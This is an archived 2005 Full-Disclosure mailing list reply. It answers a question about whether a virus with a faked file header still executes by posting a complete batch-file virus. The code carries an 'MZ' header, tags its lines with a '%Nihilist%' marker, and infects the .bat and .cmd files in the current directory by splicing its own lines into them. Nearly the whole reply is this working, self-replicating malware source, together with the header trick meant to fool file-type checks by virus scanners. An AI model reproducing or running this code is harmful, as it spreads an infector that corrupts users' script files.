RE: [Full-disclosure] RE: Full-Disclosure Digest, Vol 8, Issue 48
auto445789_at_hushmail.com
Date: 10/28/05
- Previous message: Valdis Shkesters: "[Full-disclosure] Re: Microsoft AntiSpyware falling further behind"
- Maybe in reply to: Stejerean, Cosmin: "[Full-disclosure] RE: Full-Disclosure Digest, Vol 8, Issue 48"
- Next in thread: Martijn Lievaart: "RE: [Full-disclosure] RE: Full-Disclosure Digest, Vol 8, Issue 48"
- Reply: Martijn Lievaart: "RE: [Full-disclosure] RE: Full-Disclosure Digest, Vol 8, Issue 48"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Thu, 27 Oct 2005 19:10:25 -0700 To: <full-disclosure@lists.grok.org.uk>
> The virus scanner determined the type of the file by
> the header and it failed. That's bad news. I am
> wondering however, when I execute that file, how does
> the OS process the file? I guess my question is, if I
> have a modified version of a virus, with whatever
> header, if I try to execute that file, will the virus
> code get executed?
Lets see, do you think this would be executed?
-------------------------------------------------------
MZ%Nihilist%
%Nihilist%@echo off
%Nihilist%set num=0
:ag %Nihilist%
%Nihilist%set fn%num%=
%Nihilist%set /a num+=1
%Nihilist%if %num% LSS 5 goto ag
%Nihilist%set num=0
%Nihilist%for %%a in (*.bat *.cmd) do call :mr %%a
%Nihilist%set num=-1
:fi %Nihilist%
%Nihilist%set /a num+=1
%Nihilist%if %num% GTR 5 (goto ROF)
%Nihilist%if %num% EQU 0 (set file=%fn0%)
%Nihilist%if %num% EQU 1 (set file=%fn1%)
%Nihilist%if %num% EQU 2 (set file=%fn2%)
%Nihilist%if %num% EQU 3 (set file=%fn3%)
%Nihilist%if %num% EQU 4 (set file=%fn4%)
%Nihilist%if %num% EQU 5 (set file=%fn5%)
%Nihilist%set rnd=%random%
%Nihilist%set spth=%0
:findnum %Nihilist%
%Nihilist%set /a rnd-=10
%Nihilist%if %rnd% GEQ 10 (goto findnum)
%Nihilist%set lz=0
%Nihilist%del tmp
%Nihilist%for /f "tokens=1*" %%a in (%file%) do if 1 EQU 1 (
%Nihilist% set lc=%%a %%b
%Nihilist% call :wl
%Nihilist%)
find "Nihilist" <%spth% >>tmp
%Nihilist%more +%rnd% < %file% >>tmp
%Nihilist%move /y tmp %file%
%Nihilist%@echo on
%Nihilist%goto fi
:wl %Nihilist%
%Nihilist%set /a lz=%lz%+1
%Nihilist%if %lz% LEQ %rnd% (echo %lc% >>tmp)
%Nihilist%goto :EOF
:mr %Nihilist%
%Nihilist%if %num% LEQ 5 (
%Nihilist%set fn%num%=%1
%Nihilist%set /a num+=1
%Nihilist%)
:ROF %Nihilist%
-------------------------------------------------------
Concerned about your privacy? Instantly send FREE secure email, no account required
http://www.hushmail.com/send?l=480
Get the best prices on SSL certificates from Hushmail
https://www.hushssl.com?l=485
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
- Previous message: Valdis Shkesters: "[Full-disclosure] Re: Microsoft AntiSpyware falling further behind"
- Maybe in reply to: Stejerean, Cosmin: "[Full-disclosure] RE: Full-Disclosure Digest, Vol 8, Issue 48"
- Next in thread: Martijn Lievaart: "RE: [Full-disclosure] RE: Full-Disclosure Digest, Vol 8, Issue 48"
- Reply: Martijn Lievaart: "RE: [Full-disclosure] RE: Full-Disclosure Digest, Vol 8, Issue 48"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
